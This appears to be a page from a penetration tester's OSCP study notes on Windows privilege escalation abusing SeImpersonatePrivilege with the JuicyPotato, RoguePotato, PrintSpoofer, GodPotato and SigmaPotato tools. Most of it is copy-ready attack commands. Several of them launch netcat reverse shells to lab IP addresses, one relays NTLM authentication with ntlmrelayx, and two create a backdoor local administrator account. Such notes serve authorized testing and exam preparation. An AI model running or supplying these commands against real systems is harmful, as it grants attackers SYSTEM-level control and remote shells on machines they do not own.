x

Potato Exploits and PrintSpoofer

17.16.1 - How These Work

These take advantage of the SeImpersonatePrivilege to escalate to SYSTEM
When you assign the "Impersonate a client after authentication" right to a user, you permit programs that run on behalf of that user, to impersonate a client. Essentially a user can access the token (and the privileges) of another user. An attacker with this privilege could create a service, mislead a client into connecting to the service, then impersonate that computer to elevate the attacker's level of access to that of the device.

17.16.2 - CLSIDs

A CLSID (Class Identifier) is a globally unique identifier (GUID) that Windows uses to identify COM (Component Object Model) classes — essentially, registered software components that can be created and used by programs. A CLSID is like a unique serial number assigned to a COM object so the system knows what code to load when it’s requested.

Check CLSIDs from here:
https://github.com/ohpe/juicy-potato/tree/master/CLSID

17.16.3 - JuicyPotato (Legacy)

Works on Windows 7, 8, 10, Server '08, '12
Doesn't work on Win 10 Post-1809 & Server 2019/2022
JuicyPotato abuses DCOM activation to impersonate SYSTEM, requires CLSID allowing SYSTEM token impersonation 

.\JuicyPotato.exe -t * -p "C:\Windows\System32\cmd.exe" -a whoami -l 1337 -c {CLSID}

.\jp32.exe -t * -p cmd.exe -a "/c C:/Users/apache/Desktop/nc.exe 192.168.45.231 8082 -e cmd" -l 8083 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

17.16.4 - RoguePotato (JuicyPotato Alternative)

Works on Windows 10, Server 2019
Doesn't work on Windows Server 2022 (hardened DCOM)
Similar to the JuicyPotato attack but doesn't require CLSID
Uses an attacker-controller RPC sever to trick Windows into relaying SYSTEM authentication

Use ntlmrelayx for an smbserver 

sudo impacket-ntlmrelayx -t smb://TARGETIP --no-smb-server

Bind shell 

RoguePotato.exe -r <LHOST> -l 9999 -p "C:\Windows\System32\cmd.exe" -a "/c whoami"

Reverse shell 

RoguePotato.exe -r <LHOST> -l 9999 -p "C:\Users\Public\nc.exe" -a "-e cmd.exe <RHOST> 4444"

17.16.5 - PrintSpoofer (Best for OSCP)

Works on Windows 10+, Server 2019, Server 2022
Abuses Print Spooler service to elevate privileges
No external dependencies or network interaction 

PrintSpoofer64.exe -i -c "nc.exe 192.168.45.225 9006 -e powershell"

17.16.6 - GodPotato

There are 3 version for respective .NET frameworks installed. Chances are it's V4.

  • Works on Windows 11, Server 2022
  • Doesn't work on older Windows versions
  • Works similarly to RoguePotato but on newer OS versions, uses NTLM authentication relay via DCOM exploitation 
GodPotato-NET4.exe -cmd "cmd.exe"

.\GodPotato-NET4.exe -cmd ".\nc.exe 192.168.49.93 9002 -e cmd"

.\GodPotato-NET3.5.exe -cmd ".\nc.exe 192.168.45.227 9002 -e cmd"

.\GodPotato-NET2.exe -cmd ".\nc.exe 192.168.45.227 9002 -e cmd"

17.16.7 - SigmaPotato (Newer DCOM Exploit)

Works on Windows Server 2019, 2022
Exploits new DCOM objects to get SYSTEM, no CLSIDs required and works like GodPotato but better 

SigmaPotato.exe cmd.exe

.\SigmaPotato.exe --revshell 192.168.45.159 9002

.\SigmaPotato "net user dave4 lab /add"

.\SigmaPotato "net localgroup Administrators dave4 /add"

.\SigmaPotato ".\nc.exe 192.168.45.159 9002 -e cmd"

net localgroup Administrators
Left-click: follow link, Right-click: select node, Scroll: zoom
x